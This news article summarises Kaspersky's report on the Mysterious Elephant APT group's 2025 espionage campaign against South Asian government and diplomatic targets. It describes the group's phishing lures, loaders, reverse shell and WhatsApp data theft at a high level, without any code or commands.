A shadowy hacker collective known as Mysterious Elephant has emerged as one of the most active Advanced Persistent Threat (APT) groups in the Asia-Pacific region. Discovered by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has evolved into a sophisticated cyber-espionage network targeting government and diplomatic entities across South and Southeast Asia.
Kaspersky’s latest report reveals that the group’s ongoing 2025 campaign marks a major escalation—deploying newly developed malware, hijacking WhatsApp data, and exploiting phishing tactics to infiltrate sensitive systems.
Origins and Evolution of the Threat
Initially detected through attack signatures similar to the Confucius APT group, Mysterious Elephant quickly stood out for its hybrid tactics. Investigators found that its malware integrated code from multiple threat actors, including Origami Elephant, Confucius, and SideWinder, suggesting either collaboration or resource sharing within the regional cybercrime ecosystem.
FCRF Launches CCLP Program to Train India’s Next Generation of Cyber Law Practitioners
Unlike its predecessors, Mysterious Elephant didn’t just reuse old tools—it rebuilt and improved them. The group refined abandoned modules like Vtyrei, originally seen in earlier Asian espionage campaigns, to develop more resilient and stealthy attack frameworks.
New Tactics in 2025: Phishing, PowerShell, and Custom Malware
In early 2025, the group’s tactics, techniques, and procedures (TTPs) underwent a significant transformation. Spear phishing emerged as their main infiltration method, with highly personalized emails mimicking legitimate diplomatic communication.
The targets—primarily government departments in Pakistan, Bangladesh, Nepal, Afghanistan, and Sri Lanka—received fake documents linked to political or international events. One decoy referenced Pakistan’s bid for a non-permanent seat on the UN Security Council (2025–2026), a clever way to lure officials into opening infected attachments.
Once inside a network, the attackers deploy PowerShell scripts to execute hidden commands, download payloads, and establish persistence. These scripts disguise themselves as normal administrative functions, using tools like curl and certutil to communicate with attacker-controlled servers.
Advanced Tools: BabShell, MemLoader, and WhatsApp Data Theft
The group’s toolset has become increasingly specialized. Among its new arsenal is BabShell, a C++ reverse shell that enables real-time command execution on compromised systems. It gathers system details, creates execution threads, and transmits results to its command-and-control (C2) server, effectively giving hackers full interactive control.
Two loaders—MemLoader HidenDesk and MemLoader Edge—serve as key components of the infection chain.
- HidenDesk loads payloads directly in memory to avoid detection, creates hidden virtual desktops for operations, and decrypts data using custom RC4-like encryption.
- MemLoader Edge embeds the VRat backdoor, performs sandbox detection by probing bing.com:445, and executes payloads only when safe.
A particularly alarming innovation is the group’s ability to spy on WhatsApp communications. Through specialized exfiltration tools such as Uplo Exfiltrator, Stom Exfiltrator, and ChromeStealer Exfiltrator, the attackers steal files shared via WhatsApp Desktop, including documents, photos, archives, and chat data.
These tools recursively scan drives and system folders for sensitive file types, encrypt the stolen data, and upload it to C2 servers using disguised network protocols.
Infrastructure and Victim Profile
Mysterious Elephant operates a dynamic infrastructure of rotating domains and virtual private servers, using wildcard DNS and cloud-based hosting to obscure its trail. The flexibility allows it to continuously reconfigure its attack servers and stay ahead of security countermeasures.
Victim analysis shows a concentration in South Asia, primarily government departments, foreign affairs ministries, and diplomatic missions. Attackers craft personalized payloads for each victim, often embedding local political or administrative themes to enhance credibility.
A Threat to National Security
Cyber experts warn that the scale and precision of Mysterious Elephant’s attacks signal a long-term espionage strategy, not short-term financial crime. The stolen data—ranging from diplomatic correspondence to official documents—poses serious risks to national security and geopolitical stability in the region.
Kaspersky researchers emphasize that while the group’s methods evolve rapidly, consistent patterns like custom loader use, encrypted exfiltration, and targeted phishing remain the core of its operations.
Governments and institutions are urged to tighten network monitoring, enforce strict patching schedules, and conduct cybersecurity training to defend against this persistent threat. Collaboration between international agencies remains critical to tracking and disrupting Mysterious Elephant’s expanding operations.
